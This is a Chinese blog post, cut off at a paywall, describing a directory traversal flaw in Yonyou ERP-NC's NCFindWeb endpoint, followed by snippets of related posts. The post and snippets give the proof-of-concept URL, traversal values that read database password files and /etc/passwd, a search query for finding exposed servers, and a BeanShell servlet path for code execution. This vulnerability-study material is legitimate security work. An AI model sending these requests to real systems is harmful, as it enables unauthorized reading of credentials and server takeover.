用友OA漏洞学习——NCFindWeb 目录遍历漏洞

已于 2022-07-05 10:04:24 修改
阅读量1.5k 收藏 5
点赞数 7
分类专栏: 漏洞学习 文章标签: 用友OA漏洞学习
于 2022-07-03 18:40:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xiaofengdada/article/details/125587646
版权

警告

请勿使用本文提到的内容违反法律
本文不提供任何担保

目录

警告

一、概述

二、影响版本

三、漏洞复现

(一)验证poc如下:

 读取默认配置文件(可以看到内网多组数据库配置,数据库群):

一、概述

        用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。

二、影响版本

        用友ERP-NC版本不详。

三、漏洞复现

(一)验证poc如下:

/NCFindWeb?service=IPreAlertConfigService&filename=
了解本专栏 订阅专栏 解锁全文 超级会员免费看
用友ERP-NC 目录遍历
善恶终有报,天道好轮回;不信抬头看,苍天饶过谁
08-20 446
子夏曰:“贤贤易色,事父母能竭其力,事君能致其身,与朋友交,言而有信,虽曰未学,吾必谓之学矣。”
SRC-用友 ERP-NC NCFindWeb 目录遍历漏洞
hackzkaq的博客
11-06 1261
NCFindWeb?service=IPreAlertConfigService&filename=文件名。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。if判断返回的数据出现index.html文件名则代表存在漏洞,否则不存在。在url处拼接poc后可以看到该站点的目录和文件。这里使用的是pocsuite3的poc模板。只需要修改_verify()部分即可。
用友NC目录遍历漏洞
DUANYU23的博客
04-26 2892
用友NC目录遍历漏洞0X001前言0X002 漏洞影响0X003 漏洞原理0X004 漏洞复现0X041 空间搜索寻找目标0X005 POC0X006 修复建议 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标 搜索语法:title="Azkaban" 0X042 访问网页(目录遍历) http://ip/NCFindWeb?service=IPreAlertConfigService&filename 0X005 POC 0X0
用友NC系列漏洞检测利用工具
最新发布
m0_74786138的博客
03-02 460
声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!
用友NC 漏洞
2301_80115097的博客
12-01 677
NCFindWeb?service=IPreAlertConfigService&filename=文件名。用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。if判断返回的数据出现index.html文件名则代表存在漏洞,否则不存在。在url处拼接poc后可以看到该站点的目录和文件。这里使用的是pocsuite3的poc模板。只需要修改_verify()部分即可。使用pocsuite3批量验证。
漏洞挖掘姿势之-用友NC目录遍历
Grace_for_it的博客
05-19 505
渗透测试 漏洞验证 用友NC
用友NC目录遍历漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-18 2545
简介: 用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。 漏洞复现: fofa直接搜索: app="用友-UFIDA-NC" 漏洞拼接目录: /NCFindWeb?service=IPreAlertConfigService&filename /NCFindWeb?service=IPreAlertConfigService&filename= 读取:filename=读取的文件名 ...
漏洞复现-用友UFIDA-YongYou系列
aming小老弟
10-03 2228
UFIDA是中国的一家知名企业软件公司,全称为用友软件股份有限公司(Yonyou Software Co . , Ltd . )。该公司成立于 1988 年,总部位于北京,是中国领先的企业管理软件和云服务提供商之一。UFIDA主要专注于开发和提供企业级软件解决方案,包括财务管理、人力资源管理、采购管理、销售管理、供应链管理、生产制造管理等。它的产品被广泛应用于各种行业,如制造业、服务业、金融业、医疗保健和公共事业等。UFIDA致力于帮助企业提高管理效率、优化业务流程,并提供数据分析和决策支持工具。
用友ERP-NC系统 漏洞 NCFindWeb接口任意文件下载
ShenZ的博客
07-28 2538
漏洞权限比较大,可以获取数据库,/etc/passwd等信息,漏洞存在链接: http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml 可以读取到数据库密码 WEB-INF/web.xml ../../../../../etc/passwd ...
用友UFIDA NC目录遍历漏洞
菜鸟的自学之路
12-12 366
用友NC目录遍历、任意文件读取漏洞复现
用友ERP-NC系统 NCFindWeb接口文件读取
maverickpig的博客
03-10 2442
用友NC NCfindweb接口文件读取漏洞
Java反序列化攻击
01-21
Java 反序列化攻击漏洞由FoxGlove 的近的一篇博文爆出,该漏洞可以被黑客利用向服务器上传恶意脚本,或者远程执行命令。   由于目前发现该漏洞存在于 Apache commons-collections, Apache xalan 和 Groovy 包中,也意味着使用了这些包的服务器(目前发现有WebSphere, WebLogic,JBoss),第三方框架(Spring,Groovy),第三方应用(Jenkins),以及依赖于这些服务器,框架或者直接/间接引用这些包的应用都会受到威胁,这样的应用的数量会以百万计。   说到漏洞存在的原因,根本还在于 Java 序列化自身的缺陷,众
用友NC的一些漏洞复现
yzl_007的博客
12-15 1万+
用友NC的一些漏洞复现 一、BeanShell Test Servlet命令执行 漏洞介绍:用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。 影响范围:NC 6.5版本 复现过程: 访问对应网站后界面如下: 漏洞url就是:ip地址:端口/servlet/~ic/bsh.servlet.BshServlet 后续还可以写shell进去,但是这里不
用友OA漏洞复现手册
热门推荐
1stPeak's Blog
04-20 1万+
用友OA漏洞复现手册 前言:用友OA产品漏洞复现笔记,供自己使用,不定期更新
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 9493
用友NC 漏洞汇总
【网络安全的神秘世界】目录遍历漏洞
菜鸟小羊的博客
09-14 1847
目录遍历(Directory traversal),也称文件路径遍历目录穿越、路径穿越等。是由于网站本身存在配置缺陷,导致网站目录可以被任意浏览,从而使得攻击者可以访问到原本不具备权限访问的内容,造成信息泄露,为攻击者实施进一步的网络入侵提供帮。
【1】高危漏洞利用工具 (2023.1.6更新)-- Apt_t00ls
司徒荆的博客
01-09 1807
ATP-tools 增加CNVD-2023-00895 包括:泛微、蓝凌、用友、万户、致远、通达、中间件、安全设备等多个高位漏洞
web安全目录遍历漏洞学习及绕过
m0re's blog
09-08 4793
本文目录目录遍历漏洞介绍一些绕过方式防御如何利用目录遍历上传shell并拿到一个低权限 目录遍历漏洞介绍 路径遍历攻击(也称为目录遍历)是指在访问储存在web根目录文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。 需要注意的是,系统操作访问控制(如在微软windows操作系统上锁定或使用文件)限制了对文件的访问权限。 这种攻击也称为 “点-点斜线”、“目录遍历”、“目
web渗透测试----6、目录遍历漏洞
七天
12-24 2308
文章目录一、目录遍历漏洞原理二、漏洞示例三、常见绕过四、绕过防御示例1、未进行任何防御2、双写进行绕过3、利用编码进行绕过4、利用%00截断后缀绕过5、利用文件路径绕过五、漏洞防御 一、目录遍历漏洞原理 目录遍历漏洞通过操纵引用带有“点-点-斜杠(…/)”序列及其变体的变量或使用绝对路径,攻击者可以读取运行在服务器上的任意文件,包括应用程序代码和数据、后端系统的凭据以及敏感的操作系统文件。在某些情况下,攻击者能够向服务器写入任意文件,从而允许他们修改应用程序数据或行为,并最终完全控制服务器。 二、漏洞
用友OA漏洞liqun
07-28
很抱歉,我无法理解你的问题。你可以提供更多的信息或者重新提问吗? #### 引用[.reference_title] ..."1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute....
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaochuhe--kaishui

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值